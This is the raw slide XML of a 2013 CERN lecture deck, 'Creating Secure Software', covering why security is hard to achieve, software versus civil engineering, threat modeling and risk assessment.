          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103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9388" y="188913"/>
            <a:ext cx="7993062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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="266700" indent="-2667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600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="711200" indent="-265113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Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2300">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1079500" indent="-188913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435100" indent="-176213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1790700" indent="-176213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247900" indent="-176213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705100" indent="-176213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162300" indent="-176213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619500" indent="-176213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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.jpeg"/><Relationship Id="rId5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8.w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9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0.w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1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4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24.jpe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25.jpe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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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28.wmf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6.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId2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32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33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9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l.cam.ac.uk/~rja14/book.html" TargetMode="External"/><Relationship Id="rId4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0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png"/><Relationship Id="rId6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jpe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3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4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5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6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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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9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wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.w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0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1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3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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png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5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6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8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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png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0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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://security.web.cern.ch/security/recommendations/en/code_tools.shtml" TargetMode="Externa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png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png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ng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jpeg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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.jpeg"/><Relationship Id="rId5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4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5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6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png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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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611188" y="1916113"/>
            <a:ext cx="8053387" cy="4608512"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0" smtClean="0">
                <a:latin typeface="Bernard MT Condensed" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Creating Secure Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="60000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sebastian Lopienski</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="60000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CERN Deputy Computer Security Officer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Openlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/summer student lectures 2013</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/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Why security is difficult to achieve?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Security in computer systems – even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>great complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>dependency on the Operating System, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File System, network, physical access etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Software/system security is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>difficult to measure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>function a() is 30% more secure than function b() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>there are no security metrics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>How to test security?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Deadline pressure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Clients don’t demand security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>… and can’t sue a vendor </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15364" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7380288" y="4149725"/>
            <a:ext cx="1084262" cy="1638300"/>
            <a:chOff x="5239" y="1277"/>
            <a:chExt cx="984" cy="1488"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15365" name="Picture 5" descr="ladder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39" y="1613"/>
              <a:ext cx="852" cy="1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366" name="Picture 6" descr="cloud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23" y="1277"/>
              <a:ext cx="600" cy="3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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29698" name="Picture 2" descr="E:\Local\2010.06 Sec Day\securing\img\failcamer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3775" y="1125538"/>
            <a:ext cx="7899400" cy="4967287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6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="399985">
            <a:off x="303213" y="4821238"/>
            <a:ext cx="3822700" cy="1703387"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln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en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security measures that get disabled with time, when new features </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are installed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389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Things to avoid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21264967">
            <a:off x="5807893" y="5308618"/>
            <a:ext cx="3174366" cy="1269596"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>
          </a:solidFill>
          <a:ln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en-GB" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is a process</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Software vs. Civil Engineering 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mtClean="0"/>
              <a:t>Millennia vs. decades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Civil Engineering started with first civilizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Software Engineering is a very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>young</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i="1" smtClean="0"/>
              <a:t>Secure Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Engineering is in its infancy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/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smtClean="0"/>
              <a:t>Software engineers have to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foresee the future</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>skyscraper has to withstand predictable weather conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>software has to survive any attack/malicious conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/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en-US" smtClean="0"/>
              <a:t>Software systems are very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fragile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>remove few bricks from a building, it will be fine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>remove few lines of code from OS kernel, it will break</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17412" name="Picture 4" descr="cod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088" y="4719638"/>
            <a:ext cx="1120775" cy="1589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Picture 5" descr="eiffe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1763" y="1412875"/>
            <a:ext cx="1122362" cy="1589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Is security an issue for you?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 software engineer? System administrator? User?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HEP laboratories are (more) at danger:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>known organizations = a tempting target </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>for attackers, vandals etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>large clusters with high bandwidth – a good place </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to launch further attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>risks are big and serious: we control accelerators with software; collect, filter and analyze experimental data etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>the potential damage could cost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>a lot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The answer is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>so, where to start?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 4" descr="yo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8900" y="4465638"/>
            <a:ext cx="2211388" cy="188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smtClean="0"/>
              <a:t>Threat Modeling and Risk Assessment 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rgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat modeling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: what threats will the system face?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>what could go wrong? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>how could the system be attacked and by whom?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Risk assessment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: how much to worry about them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>calculate or estimate potential loss and its likelihood </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>risk management – reduce both probability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>consequences of a security breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   risk = probability * impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="446087" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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9120307"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6736060" y="4293096"/>
          <a:ext cx="2034102" cy="1481982"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{F5AB1C69-6EDB-4FF4-983F-18BD219EF322}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="678034"/>
                <a:gridCol w="678034"/>
                <a:gridCol w="678034"/>
              </a:tblGrid>
              <a:tr h="493994"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91443" marR="91443"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91443" marR="91443"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91443" marR="91443"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00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="493994"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91443" marR="91443"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91443" marR="91443"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91443" marR="91443"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493994"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91443" marR="91443"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91443" marR="91443"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91443" marR="91443" marT="45718" marB="4571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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6012160" y="4365305"/>
            <a:ext cx="2664295" cy="2016199"/>
            <a:chOff x="2059037" y="2981739"/>
            <a:chExt cx="3241833" cy="2361437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2782972" y="4955691"/>
              <a:ext cx="2517898" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow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sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688227" y="4943066"/>
              <a:ext cx="1354859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1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0"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2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0"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3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0"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4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0"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itchFamily="18" charset="0"/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itchFamily="18" charset="0"/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itchFamily="18" charset="0"/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itchFamily="18" charset="0"/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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" b="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>probability</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="1692044" y="3853581"/>
              <a:ext cx="1743683" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow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sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="1789251" y="4154556"/>
              <a:ext cx="939681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1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0"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2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0"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3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0"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4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0"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itchFamily="18" charset="0"/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itchFamily="18" charset="0"/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itchFamily="18" charset="0"/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Font typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:defRPr sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:sym typeface="Wingdings 2" pitchFamily="18" charset="2"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" b="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>impact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333108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i="1" smtClean="0"/>
              <a:t>Secure against what and from whom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>who will be using the application?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>what does the user (and the admin) care about?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>where will the application run?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(on a local system as Administrator/root? An intranet application? As a web service available to the public? On a mobile phone?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>what are you trying to protect and against whom?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Steps to take</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> threats, risks and consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> the threats and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> the risks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smtClean="0"/>
              <a:t>Threat Modeling and Risk Assessment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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 20" descr="C:\Sebastian\CERN\my presentations\future\camera-fai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7800" y="1268413"/>
            <a:ext cx="8642350" cy="4864100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7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21076162">
            <a:off x="4919663" y="4935538"/>
            <a:ext cx="3822700" cy="1325562"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln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en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security solutions </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that do not cover the whole exposure area</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509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Things to avoid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How to get secure?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CC3300"/>
                </a:solidFill>
              </a:rPr>
